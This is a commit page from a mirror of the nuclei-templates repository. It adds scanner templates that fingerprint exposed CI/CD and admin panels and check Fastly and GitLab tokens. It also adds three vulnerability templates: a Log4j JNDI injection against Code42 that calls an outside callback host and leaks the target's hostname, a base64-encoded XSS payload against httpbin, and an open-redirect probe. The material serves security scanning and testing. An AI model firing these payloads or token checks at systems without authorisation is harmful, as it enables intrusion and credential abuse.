daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added 23 Nuclei Templates (#3909) 

* Added 23 Nuclei Templates

* Update cofense-vision-detection.yml

* Update sophos-mobile-panel-detection.yml

* Update cofense-vision-detection.yml

* Update httpbin-open-redirect.yml

* Update httpbin-xss.yml

* Update ansible-semaphore-panel.yml

* Rename ansible-semaphore-panel.yml to ansible-semaphore-panel.yaml

* Update and rename avatier_password_management.yml to avatier-password-management.yaml

* Update and rename buddy-panel.yml to buddy-panel.yaml

* Update and rename buildbot-panel.yml to buildbot-panel.yaml

* Update and rename cofense-vision-detection.yml to cofense-vision-panel.yaml

* Update and rename concourse-ci-panel.yml to concourse-ci-panel.yaml

* Update and rename drone-ci-panel.yml to drone-ci-panel.yaml

* Update and rename flowci-detection.yml to flowci-panel.yaml

* Update and rename gradle-enterprise-build-cache-detect.yml to gradle-cache-node-detect.yaml

* Update and rename exposed-panels/gradle-cache-node-detect.yaml to exposed-panels/gradle/gradle-cache-node-detect.yaml

* Update and rename exposed-panels/gradle-enterprise-panel.yml to exposed-panels/gradle/gradle-enterprise-panel.yaml

* Update and rename httpbin-detection.yml to httpbin-panel.yaml

* Update and rename leostream-detection.yml to leostream-panel.yaml

* Delete redash-detection.yml

* Update and rename sophos-mobile-panel-detection.yml to sophos-mobile-panel.yaml

* Update and rename splunk-enterprise-login-panel.yml to splunk-enterprise-panel.yaml

* Update splunk-enterprise-panel.yaml

* Update and rename stridercd-detection.yml to stridercd-panel.yaml

* Update and rename zuul-panel.yml to zuul-panel.yaml

* Update and rename zentral-detection.yml to zentral-panel.yaml

* Update and rename api-fastly.yml to api-fastly.yaml

* Update and rename api-gitlab.yml to api-gitlab.yaml

* Update and rename httpbin-xss.yml to httpbin-xss.yaml

* Update and rename httpbin-open-redirect.yml to httpbin-open-redirect.yaml

* Update and rename log4j-code42-rce.yml to code42-log4j-rce.yaml

* minor matcher fixes

* added missing hostname variable

* meta data update

Co-authored-by: Prince Chaddha <prince@projectdiscovery.io>
Co-authored-by: sandeep <sandeep@projectdiscovery.io>
patch-1
Adam Crosser 2022-03-16 08:17:58 -05:00 committed by GitHub
parent d406769a74
commit aa47b1d97b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
22 changed files with 583 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

27
exposed-panels/ansible-semaphore-panel.yaml Normal file
View File

@ -0,0 +1,27 @@
id: ansible-semaphore-panel
info:
name: Ansible Semaphore Panel Detect
author: Yuzhe-zhang-0
severity: info
reference:
- https://ansible-semaphore.com/
- https://github.com/ansible-semaphore/semaphore
metadata:
shodan-query: http.html:"Semaphore</title>"
tags: panel,ansible,semaphore,cicd,oss
requests:
- method: GET
path:
- '{{BaseURL}}/auth/login'
matchers-condition: or
matchers:
- type: word
words:
- '<title>Ansible Semaphore</title>'
- type: regex
regex:
- '<title(.*)>Semaphore</title>'

23
exposed-panels/avatier-password-management.yaml Normal file
View File

@ -0,0 +1,23 @@
id: avatier-password-management
info:
name: Avatier Password Management Panel Detect
author: praetorian-thendrickson
severity: info
reference: https://www.avatier.com
metadata:
shodan-query: http.favicon.hash:983734701
tags: panel,avatier
requests:
- method: GET
path:
- '{{BaseURL}}/aims/ps/'
matchers-condition: and
matchers:
- type: word
words:
- 'LabelWelcomeToPS'
- 'Avatier Corporation'
condition: and

30
exposed-panels/buddy-panel.yaml Normal file
View File

@ -0,0 +1,30 @@
id: buddy-panel
info:
name: Buddy Panel Detect
author: thardt-praetorian
severity: info
reference: https://buddy.works
metadata:
shodan-query: http.favicon.hash:-850502287
tags: panel,buddy,cicd
requests:
- method: GET
path:
- '{{BaseURL}}'
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<meta name="application-name" content="Buddy">'
- 'Buddy App'
condition: or
- type: status
status:
- 200

28
exposed-panels/buildbot-panel.yaml Normal file
View File

@ -0,0 +1,28 @@
id: buildbot-panel
info:
name: Buildbot Panel Detect
author: thardt-praetorian
severity: info
reference: https://buildbot.net
metadata:
shodan-query: http.title:"BuildBot"
tags: panel,buildbot,cicd
requests:
- method: GET
path:
- '{{BaseURL}}'
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '<title(.*)>Buildbot</title>'
- type: status
status:
- 200

27
exposed-panels/cofense-vision-panel.yaml Normal file
View File

@ -0,0 +1,27 @@
id: cofense-vision-panel
info:
name: Cofense Vision Panel Detect
author: Adam Crosser
severity: info
reference: https://cofense.com
metadata:
shodan-query: http.favicon.hash:739801466
tags: panel,cofense,vision
requests:
- method: GET
path:
- '{{BaseURL}}/login'
matchers-condition: and
matchers:
- type: word
words:
- "<title>Vision</title>"
- "Cofense Inc."
condition: and
- type: status
status:
- 200

24
exposed-panels/concourse-ci-panel.yaml Normal file
View File

@ -0,0 +1,24 @@
id: concourse-ci-panel
info:
name: Concourse CI Panel Detect
author: praetorian-thendrickson
severity: info
reference:
- https://github.com/concourse/concourse
- https://concourse-ci.org
metadata:
shodan-query: title:"Concourse"
tags: panel,concourse,oss
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers:
- type: word
words:
- '<title>Concourse</title>'
- 'login to Concourse'
condition: or

27
exposed-panels/drone-ci-panel.yaml Normal file
View File

@ -0,0 +1,27 @@
id: drone-ci-panel
info:
name: Drone CI Panel Detect
author: Yuzhe-zhang-0
severity: info
reference: https://www.drone.io
metadata:
shodan-query: http.favicon.hash:1354079303
tags: panel,droneci,cicd
requests:
- method: GET
path:
- '{{BaseURL}}/welcome'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Drone CI</title>'
- '<title>Drone | Continuous Integration</title>'
condition: or
- type: status
status:
- 200

25
exposed-panels/flowci-panel.yaml Normal file
View File

@ -0,0 +1,25 @@
id: flowci-panel
info:
name: FlowCI Panel Detect
author: Adam Crosser
severity: info
reference:
- https://github.com/FlowCI/flow-web-x
- https://flowci.github.io/#/
tags: panel,flowci
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- '<title>flow-web-x</title>'
- type: status
status:
- 200

25
exposed-panels/gradle/gradle-cache-node-detect.yaml Normal file
View File

@ -0,0 +1,25 @@
id: gradle-cache-node-detect
info:
name: Gradle Enterprise Build Cache Node Detect
author: Adam Crosser
severity: info
reference: https://gradle.com
tags: panel,gradle,cache
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers:
- type: regex
regex:
- "<span>Gradle Enterprise Build Cache Node (.*)</span>"
extractors:
- type: regex
part: body
group: 1
regex:
- "<span>Gradle Enterprise Build Cache Node (.*)</span>"

21
exposed-panels/gradle/gradle-enterprise-panel.yaml Normal file
View File

@ -0,0 +1,21 @@
id: gradle-enterprise-panel
info:
name: Gradle Enterprise Panel Detect
author: Adam Crosser
severity: info
tags: panel,gradle
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Gradle Enterprise</title>"

25
exposed-panels/httpbin-panel.yaml Normal file
View File

@ -0,0 +1,25 @@
id: httpbin-panel
info:
name: HTTPBin Panel Detect
author: Adam Crosser
severity: info
reference: https://github.com/postmanlabs/httpbin
metadata:
shodan-query: http.title:"httpbin.org"
tags: panel,httpbin,oss
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- '<title>httpbin.org</title>'
- type: status
status:
- 200

24
exposed-panels/leostream-panel.yaml Normal file
View File

@ -0,0 +1,24 @@
id: leostream-panel
info:
name: Leostream Panel Detect
author: praetorian-thendrickson
severity: info
reference: https://leostream.com
metadata:
shodan-query: http.title:"Leostream"
tags: panel,leostream
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Leostream</title>'
- type: status
status:
- 200

20
exposed-panels/sophos-mobile-panel.yaml Normal file
View File

@ -0,0 +1,20 @@
id: sophos-mobile-panel
info:
name: Sophos Mobile Panel Detect
author: Adam Crosser
severity: info
reference: https://www.sophos.com/en-us/products/mobile-control
metadata:
shodan-query: http.title:"Sophos Mobile"
tags: panel,sophos
requests:
- method: GET
path:
- '{{BaseURL}}/login.xhtml?faces-redirect=true'
matchers:
- type: word
words:
- "<title>Sophos Mobile</title>"

35
exposed-panels/splunk-enterprise-panel.yaml Normal file
View File

@ -0,0 +1,35 @@
id: splunk-enterprise-panel
info:
name: Splunk Enterprise Panel Detect
author: praetorian-thendrickson
severity: info
reference: https://www.splunk.com/en_us/software/splunk-enterprise.html
metadata:
shodan-query: http.title:"Login - Splunk"
tags: panel,splunk
requests:
- method: GET
path:
- '{{BaseURL}}/en-US/account/login'
redirects: true
matchers-condition: and
matchers:
- type: word
words:
- 'Splunk Inc.'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"version": "(.*)"'
- 'versionNumber": "([0-9.]+)"'
- '"VERSION_LABEL": "([0-9.]+)"'

24
exposed-panels/stridercd-panel.yaml Normal file
View File

@ -0,0 +1,24 @@
id: stridercd-panel
info:
name: StriderCD Panel
author: Adam Crosser
severity: info
reference:
- https://github.com/Strider-CD/strider
- https://strider-cd.github.io
metadata:
shodan-query: http.favicon.hash:115295460
tags: panel,cicd,oss,stridercd,strider
requests:
- method: GET
path:
- '{{BaseURL}}'
redirects: true
max-redirects: 2
matchers:
- type: word
words:
- "Strider: Brilliant Continuous Deployment"

22
exposed-panels/zentral-panel.yaml Normal file
View File

@ -0,0 +1,22 @@
id: zentral-panel
info:
name: Zentral pANEL Detect
author: Adam Crosser
severity: info
reference:
- https://github.com/zentralopensource/zentral
- https://zentral.io
tags: panel,zentral,oss
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers:
- type: word
words:
- '<title>Zentral</title>'
- '<div class="panel-footer btn-group btn-group-justified"'
condition: and

33
exposed-panels/zuul-panel.yaml Normal file
View File

@ -0,0 +1,33 @@
id: zuul-panel
info:
name: Zuul Panel Detect
author: Yuzhe-zhang-0
severity: info
reference: https://opendev.org/zuul/zuul
metadata:
shodan-query: http.favicon.hash:-1127895693
tags: panel,zuul,cicd,oss
requests:
- method: GET
path:
- '{{BaseURL}}/api/tenants'
- '{{BaseURL}}/api/status'
redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
part: body
words:
- '"name":'
- '"projects":'
- '"queue":'
condition: and
- type: word
words:
- 'zuul_version'

24
token-spray/api-fastly.yaml Normal file
View File

@ -0,0 +1,24 @@
id: api-fastly
info:
name: Fastly API Test
author: Adam Crosser
severity: info
reference: https://developer.fastly.com/reference/api/
tags: token-spray,fastly
self-contained: true
requests:
- method: GET
path:
- "https://api.fastly.com/current_user"
headers:
Fastly-Key: "{{token}}"
matchers:
- type: word
part: body
words:
- '"created_at":'
- '"customer_id":'
condition: and

24
token-spray/api-gitlab.yaml Normal file
View File

@ -0,0 +1,24 @@
id: api-gitlab
info:
name: Gitlab API Test
author: Adam Crosser
severity: info
reference: https://docs.gitlab.com/ee/api/personal_access_tokens.html
tags: token-spray,gitlab
self-contained: true
requests:
- method: GET
path:
- "https://gitlab.com/api/v4/personal_access_tokens"
headers:
PRIVATE-TOKEN: "{{token}}"
matchers:
- type: word
part: body
words:
- '"id":'
- '"created_at":'
condition: and

35
vulnerabilities/code42/code42-log4j-rce.yaml Normal file
View File

@ -0,0 +1,35 @@
id: code42-log4j-rce
info:
name: Log4j Code42 RCE
author: Adam Crosser
severity: critical
description: Remote code execution via log4j vulnerability
reference: https://support.code42.com/Terms_and_conditions/Code42_customer_support_resources/Code42_response_to_industry_security_incidents
classification:
cve-id: CVE-2021-44228
tags: jndi,log4j,rce,cve,cve2021,oast,code42
requests:
- method: GET
path:
- '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&url=https://localhost'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output

27
vulnerabilities/httpbin/httpbin-open-redirect.yaml Normal file
View File

@ -0,0 +1,27 @@
id: httpbin-open-redirect
info:
name: HTTPBin - Open Redirect
author: Adam Crosser
severity: low
metadata:
shodan-query:
- html:"https://github.com/requests/httpbin"
- title:"httpbin.org"
reference: https://github.com/postmanlabs/httpbin
tags: redirect,httpbin,oss
requests:
- method: GET
path:
- "{{BaseURL}}/redirect-to?url=https%3A%2F%2Fexample.com"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'location == "https://example.com"'
- type: status
status:
- 302

33
vulnerabilities/httpbin/httpbin-xss.yaml Normal file
View File

@ -0,0 +1,33 @@
id: httpbin-xss
info:
name: HTTPBin - Cross Site Scripting
author: Adam Crosser
severity: medium
reference: https://github.com/postmanlabs/httpbin
metadata:
shodan-query:
- html:"https://github.com/requests/httpbin"
- title:"httpbin.org"
tags: xss,httpbin,oss
requests:
- method: GET
path:
- '{{BaseURL}}/base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '^<script>alert\(document.domain\)</script>$'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200